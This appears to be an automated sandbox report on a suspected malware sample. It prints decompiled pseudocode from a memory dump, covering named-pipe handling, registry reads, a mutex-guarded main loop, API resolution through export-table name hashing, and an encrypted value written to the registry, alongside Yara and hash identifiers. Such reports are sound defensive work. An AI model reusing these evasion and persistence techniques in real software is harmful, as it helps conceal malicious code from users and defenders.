                                                                                                                                                                                                0x00af3313
                                                                                                                                                                                                0x00af33bb
                                                                                                                                                                                                0x00af33bd
                                                                                                                                                                                                0x00af33c4
                                                                                                                                                                                                0x00af33ca
                                                                                                                                                                                                0x00af33d0
                                                                                                                                                                                                0x00af3449
                                                                                                                                                                                                0x00af3454
                                                                                                                                                                                                0x00af3459
                                                                                                                                                                                                0x00af345c
                                                                                                                                                                                                0x00af33d2
                                                                                                                                                                                                0x00af33d5
                                                                                                                                                                                                0x00af33e1
                                                                                                                                                                                                0x00af33e3
                                                                                                                                                                                                0x00af33e9
                                                                                                                                                                                                0x00af3464
                                                                                                                                                                                                0x00af33eb
                                                                                                                                                                                                0x00af33f0
                                                                                                                                                                                                0x00af33f2
                                                                                                                                                                                                0x00af33f5
                                                                                                                                                                                                0x00af33f7
                                                                                                                                                                                                0x00af3405
                                                                                                                                                                                                0x00af340a
                                                                                                                                                                                                0x00af340d
                                                                                                                                                                                                0x00af340e
                                                                                                                                                                                                0x00af3413
                                                                                                                                                                                                0x00af3416
                                                                                                                                                                                                0x00af341a
                                                                                                                                                                                                0x00af341a
                                                                                                                                                                                                0x00af341f
                                                                                                                                                                                                0x00af342c
                                                                                                                                                                                                0x00af3431
                                                                                                                                                                                                0x00af3434
                                                                                                                                                                                                0x00af3440
                                                                                                                                                                                                0x00af3440
                                                                                                                                                                                                0x00af3466
                                                                                                                                                                                                0x00af3466
                                                                                                                                                                                                0x00af33d0
                                                                                                                                                                                                0x00af3469
                                                                                                                                                                                                0x00af347d
                                                                                                                                                                                                0x00af3482
                                                                                                                                                                                                0x00af348d
                                                                                                                                                                                                0x00af348e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af3319
                                                                                                                                                                                                0x00af3319
                                                                                                                                                                                                0x00af331c
                                                                                                                                                                                                0x00af338a
                                                                                                                                                                                                0x00af338b
                                                                                                                                                                                                0x00af338e
                                                                                                                                                                                                0x00af338f
                                                                                                                                                                                                0x00af3396
                                                                                                                                                                                                0x00af33a1
                                                                                                                                                                                                0x00af33a3
                                                                                                                                                                                                0x00af331e
                                                                                                                                                                                                0x00af331f
                                                                                                                                                                                                0x00af3322
                                                                                                                                                                                                0x00af3372
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af3324
                                                                                                                                                                                                0x00af3324
                                                                                                                                                                                                0x00af3327
                                                                                                                                                                                                0x00af335c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af3329
                                                                                                                                                                                                0x00af3329
                                                                                                                                                                                                0x00af332c
                                                                                                                                                                                                0x00af3346
                                                                                                                                                                                                0x00af334b
                                                                                                                                                                                                0x00af334e
                                                                                                                                                                                                0x00af3379
                                                                                                                                                                                                0x00af337a
                                                                                                                                                                                                0x00af337b
                                                                                                                                                                                                0x00af3350
                                                                                                                                                                                                0x00af3350
                                                                                                                                                                                                0x00af3353
                                                                                                                                                                                                0x00af3354
                                                                                                                                                                                                0x00af3354
                                                                                                                                                                                                0x00af337d
                                                                                                                                                                                                0x00af337e
                                                                                                                                                                                                0x00af332e
                                                                                                                                                                                                0x00af3331
                                                                                                                                                                                                0x00af333b
                                                                                                                                                                                                0x00af3361
                                                                                                                                                                                                0x00af3361
                                                                                                                                                                                                0x00af3366
                                                                                                                                                                                                0x00af3367
                                                                                                                                                                                                0x00af3490
                                                                                                                                                                                                0x00af3490
                                                                                                                                                                                                0x00af3491
                                                                                                                                                                                                0x00af3496
                                                                                                                                                                                                0x00af3496
                                                                                                                                                                                                0x00af3331
                                                                                                                                                                                                0x00af332c
                                                                                                                                                                                                0x00af3327
                                                                                                                                                                                                0x00af3322
                                                                                                                                                                                                0x00af331c
                                                                                                                                                                                                0x00af3313
                                                                                                                                                                                                0x00af34a7
                                                                                                                                                                                                0x00af34af
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af34af
                                                                                                                                                                                                0x00af34bb

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ConnectNamedPipe.KERNELBASE(00000000), ref: 00AF32B9
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AF32C3
                                                                                                                                                                                                  • Part of subcall function 00AFC35B: FlushFileBuffers.KERNEL32(000003B4,?,?,?,00AF3496,?,00000084,00000080), ref: 00AFC3A1
                                                                                                                                                                                                • DisconnectNamedPipe.KERNEL32 ref: 00AF34A7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2389948835-0
                                                                                                                                                                                                • Opcode ID: 8c8287f565d1ed00f3473db2f8b29b0fbd5a9cb33768433194beda6c55970b81
                                                                                                                                                                                                • Instruction ID: 8c7defb4bc4d5fc814c84eb9b703abe397058a33f07b6e7cfe6f0e8afdbb0731
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c8287f565d1ed00f3473db2f8b29b0fbd5a9cb33768433194beda6c55970b81
                                                                                                                                                                                                • Instruction Fuzzy Hash: D851EF72A0021DAECF11EFE5DE89ABEBBB8EB14311F10452AF715A7140DB719B44CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFBF79, Relevance: 6.1, APIs: 4, Instructions: 72registryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFBF79(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0xb0e68c; // 0x4d3f890
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E00AF85E5(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E00AF85FB( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}










                                                                                                                                                                                                0x00afbf97
                                                                                                                                                                                                0x00afbf9a
                                                                                                                                                                                                0x00afbf9d
                                                                                                                                                                                                0x00afbfa8
                                                                                                                                                                                                0x00afbfcc
                                                                                                                                                                                                0x00afc009
                                                                                                                                                                                                0x00afc00c
                                                                                                                                                                                                0x00afc00e
                                                                                                                                                                                                0x00afc016
                                                                                                                                                                                                0x00afc016
                                                                                                                                                                                                0x00afc019
                                                                                                                                                                                                0x00afc01b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc01b
                                                                                                                                                                                                0x00afbfd6
                                                                                                                                                                                                0x00afbfd8
                                                                                                                                                                                                0x00afbfde
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbffa
                                                                                                                                                                                                0x00afc027
                                                                                                                                                                                                0x00afc02a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc02a
                                                                                                                                                                                                0x00afc002
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc008
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00AF2BFB,00000000), ref: 00AFBFA0
                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00AF2BFB,00000000,?,00000000,00AF2BFB,00000000,?,?,00AF2BFB,00000000), ref: 00AFBFC4
                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00AF2BFB,00000000,00000000,00000000,00AF2BFB,?,?,00AF2BFB,00000000), ref: 00AFBFF2
                                                                                                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,00AF2BFB,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 00AFC027
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1586453840-0
                                                                                                                                                                                                • Opcode ID: 98b1ed7947cf01eabc291f3b781c067dcd1f7353121b8cc7970538f9ff9f989a
                                                                                                                                                                                                • Instruction ID: 00ca5bbfc78460dc70628ffe74f7f727f11d9df396a7982fdca504bfaa23182c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 98b1ed7947cf01eabc291f3b781c067dcd1f7353121b8cc7970538f9ff9f989a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 76211A7590010CFFDB10DBEADD04DAEBBB8EB98750B1141A5B611E7121DB31DA01EB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFBEDD, Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFBEDD(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char* _t34;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t34 = E00AF85E5(_v12 + 1); // executed
					_t46 = _t34;
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}









                                                                                                                                                                                                0x00afbef0
                                                                                                                                                                                                0x00afbefa
                                                                                                                                                                                                0x00afbefd
                                                                                                                                                                                                0x00afbf05
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbf07
                                                                                                                                                                                                0x00afbf0e
                                                                                                                                                                                                0x00afbf28
                                                                                                                                                                                                0x00afbf2f
                                                                                                                                                                                                0x00afbf34
                                                                                                                                                                                                0x00afbf39
                                                                                                                                                                                                0x00afbf57
                                                                                                                                                                                                0x00afbf5c
                                                                                                                                                                                                0x00afbf61
                                                                                                                                                                                                0x00afbf61
                                                                                                                                                                                                0x00afbf5c
                                                                                                                                                                                                0x00afbf39
                                                                                                                                                                                                0x00afbf66
                                                                                                                                                                                                0x00afbf70
                                                                                                                                                                                                0x00afbf70
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020019,?,04D3F9F0,00000000,?,00000002), ref: 00AFBF00
                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 00AFBF23
                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 00AFBF50
                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,00000002), ref: 00AFBF70
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1586453840-0
                                                                                                                                                                                                • Opcode ID: bd9920b8d21ba8b972dd536e7e006c246828bf5ddaaa70a92d18e9ce8677d482
                                                                                                                                                                                                • Instruction ID: a05db8e912c150dc24cae477d08bbeb895caa54c81e384e205820a56be5edf66
                                                                                                                                                                                                • Opcode Fuzzy Hash: bd9920b8d21ba8b972dd536e7e006c246828bf5ddaaa70a92d18e9ce8677d482
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C21B7B5A00108BFDB10DFA9DD84EAEBBB9EF98740B1141A9B915D7120D731DA40DBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF5624, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                			E00AF5624(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00AF9E47(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E00AF97ED(0xb0e6c8);
					_t39 = 0x37; // executed
					E00AF9ED1(_t39);
					_t11 =  *0xb0e688; // 0xb20000
					_t40 = 0x3a; // executed
					E00AF9ED1(_t40); // executed
					E00AFE503(_t63);
					_t14 =  *0xb0e688; // 0xb20000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E00AFA8AF( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0xb0e684; // 0x4d3f6c8
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0xb0e6c8,  *0xb0e6cc);
					 *0xb0e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0xb0e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E00AF85E5(0x1000);
							_t52 = 0;
							 *0xb0e770 = _t34;
							_t49 =  *0xb0e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							__eflags = _t41;
							 *0xb0e774 = _t41; // executed
						}
						E00AF1521(_t41, _t52); // executed
						E00AF98CF(E00AF2ECD, 0, __eflags, 0, 0); // executed
						E00AF300A(); // executed
						E00AF31B5(0, __eflags); // executed
						E00AF299A(); // executed
						E00AF3BA5(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0xb0e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E00AF97ED(0xb0e750);
							_push(0xb0e750);
							_push(0xb0e750); // executed
							E00AF2784();
							Sleep(0xfa0);
						}
						E00AF3D27();
						E00AF9A6F();
						E00AF34BE();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00AF2DBE();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

















                                                                                                                                                                                                0x00af5624
                                                                                                                                                                                                0x00af5630
                                                                                                                                                                                                0x00af5639
                                                                                                                                                                                                0x00af5644
                                                                                                                                                                                                0x00af5649
                                                                                                                                                                                                0x00af565c
                                                                                                                                                                                                0x00af565d
                                                                                                                                                                                                0x00af5662
                                                                                                                                                                                                0x00af5672
                                                                                                                                                                                                0x00af5673
                                                                                                                                                                                                0x00af567b
                                                                                                                                                                                                0x00af5680
                                                                                                                                                                                                0x00af5685
                                                                                                                                                                                                0x00af568f
                                                                                                                                                                                                0x00af5692
                                                                                                                                                                                                0x00af569c
                                                                                                                                                                                                0x00af56a4
                                                                                                                                                                                                0x00af56aa
                                                                                                                                                                                                0x00af56b1
                                                                                                                                                                                                0x00af56c3
                                                                                                                                                                                                0x00af56c9
                                                                                                                                                                                                0x00af56ce
                                                                                                                                                                                                0x00af56d0
                                                                                                                                                                                                0x00af56d7
                                                                                                                                                                                                0x00af56dc
                                                                                                                                                                                                0x00af56de
                                                                                                                                                                                                0x00af56e4
                                                                                                                                                                                                0x00af56ea
                                                                                                                                                                                                0x00af56ec
                                                                                                                                                                                                0x00af56ec
                                                                                                                                                                                                0x00af56ef
                                                                                                                                                                                                0x00af56ef
                                                                                                                                                                                                0x00af56f5
                                                                                                                                                                                                0x00af5703
                                                                                                                                                                                                0x00af570a
                                                                                                                                                                                                0x00af570f
                                                                                                                                                                                                0x00af5714
                                                                                                                                                                                                0x00af5719
                                                                                                                                                                                                0x00af5743
                                                                                                                                                                                                0x00af5743
                                                                                                                                                                                                0x00af5749
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af5725
                                                                                                                                                                                                0x00af572a
                                                                                                                                                                                                0x00af572b
                                                                                                                                                                                                0x00af572c
                                                                                                                                                                                                0x00af573d
                                                                                                                                                                                                0x00af573d
                                                                                                                                                                                                0x00af574b
                                                                                                                                                                                                0x00af5750
                                                                                                                                                                                                0x00af5755
                                                                                                                                                                                                0x00af575a
                                                                                                                                                                                                0x00af575a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af563b
                                                                                                                                                                                                0x00af563b
                                                                                                                                                                                                0x00af5640
                                                                                                                                                                                                0x00af5642
                                                                                                                                                                                                0x00af56b3
                                                                                                                                                                                                0x00af56b5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af5642
                                                                                                                                                                                                0x00af5760

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00AF56C3
                                                                                                                                                                                                  • Part of subcall function 00AF97ED: GetSystemTimeAsFileTime.KERNEL32(?,?,00AF5F90), ref: 00AF97FA
                                                                                                                                                                                                  • Part of subcall function 00AF97ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF981A
                                                                                                                                                                                                • Sleep.KERNELBASE(00000FA0), ref: 00AF573D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID: C]Ua
                                                                                                                                                                                                • API String ID: 3249252070-838364659
                                                                                                                                                                                                • Opcode ID: 402aa4d15d341cd366357c76ebf3894eb13fb534a95a7e606a606c58ee3766d5
                                                                                                                                                                                                • Instruction ID: 86e0b956e733d85f97b540f695faf17b38647fa59826e70cb7c5ad797afad859
                                                                                                                                                                                                • Opcode Fuzzy Hash: 402aa4d15d341cd366357c76ebf3894eb13fb534a95a7e606a606c58ee3766d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D31F9326056099BE724B7F5AE06F7B3B98DF25350B004925F328871A2EF71C900C7A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFDFEF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFDFEF(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E00AFD442( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E00AFC3BB( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                                                0x00afdff8
                                                                                                                                                                                                0x00afdffa
                                                                                                                                                                                                0x00afdffd
                                                                                                                                                                                                0x00afe000
                                                                                                                                                                                                0x00afe006
                                                                                                                                                                                                0x00afe063
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe063
                                                                                                                                                                                                0x00afe008
                                                                                                                                                                                                0x00afe013
                                                                                                                                                                                                0x00afe016
                                                                                                                                                                                                0x00afe01b
                                                                                                                                                                                                0x00afe020
                                                                                                                                                                                                0x00afe023
                                                                                                                                                                                                0x00afe025
                                                                                                                                                                                                0x00afe028
                                                                                                                                                                                                0x00afe02b
                                                                                                                                                                                                0x00afe030
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe032
                                                                                                                                                                                                0x00afe032
                                                                                                                                                                                                0x00afe044
                                                                                                                                                                                                0x00afe051
                                                                                                                                                                                                0x00afe055
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe057
                                                                                                                                                                                                0x00afe05a
                                                                                                                                                                                                0x00afe05b
                                                                                                                                                                                                0x00afe061
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe061
                                                                                                                                                                                                0x00afe078
                                                                                                                                                                                                0x00afe07d
                                                                                                                                                                                                0x00afe081
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe08d
                                                                                                                                                                                                0x00afe08d
                                                                                                                                                                                                0x00afe08f
                                                                                                                                                                                                0x00afe08f
                                                                                                                                                                                                0x00afe095
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe09b
                                                                                                                                                                                                0x00afe09f
                                                                                                                                                                                                0x00afe0a3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe0a3
                                                                                                                                                                                                0x00afe0a9
                                                                                                                                                                                                0x00afe0b1
                                                                                                                                                                                                0x00afe0b6
                                                                                                                                                                                                0x00afe0b9
                                                                                                                                                                                                0x00afe0b9
                                                                                                                                                                                                0x00afe0bb
                                                                                                                                                                                                0x00afe0bf
                                                                                                                                                                                                0x00afe0c7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe0cb
                                                                                                                                                                                                0x00afe0d3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe0d3

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(.dll,00AF604E,0000011C,00000000), ref: 00AFE0BF
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 00AFE0CB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                • String ID: .dll
                                                                                                                                                                                                • API String ID: 2574300362-2738580789
                                                                                                                                                                                                • Opcode ID: 23b3371288b1dfdebfc6bfba4e921f62e5ebb9ef3d09a479109768d890a6e73a
                                                                                                                                                                                                • Instruction ID: 1ef2e71473db183d5a50ecfd21d3d5a2f78a6b1e03690d1d5463bc82dff8ef10
                                                                                                                                                                                                • Opcode Fuzzy Hash: 23b3371288b1dfdebfc6bfba4e921f62e5ebb9ef3d09a479109768d890a6e73a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A318D71A0015D9BCB24CFA9C880BBEBBF5AF45304F284479EA45E7361DFB0D9518B90
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA076, Relevance: 4.6, APIs: 3, Instructions: 146registryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                			E00AFA076(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E00AFD442( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00B02339(_t107 + __edx,  &_v2832);
					_t54 = E00B02465(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E00AF85E5(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E00AF86C2(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E00B0230B( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E00AFF4D2( &_v16, _t104);
						E00AFEB03( &_v16,  &_v52, 0x14,  &_v328);
						E00AFEB70(_t106, _v20,  &_v328);
						_t73 = E00AF9AEF(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E00AF9781(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E00AF85FB( &_v12, 0xffffffff);
						}
						E00AF85FB( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}



























                                                                                                                                                                                                0x00afa083
                                                                                                                                                                                                0x00afa088
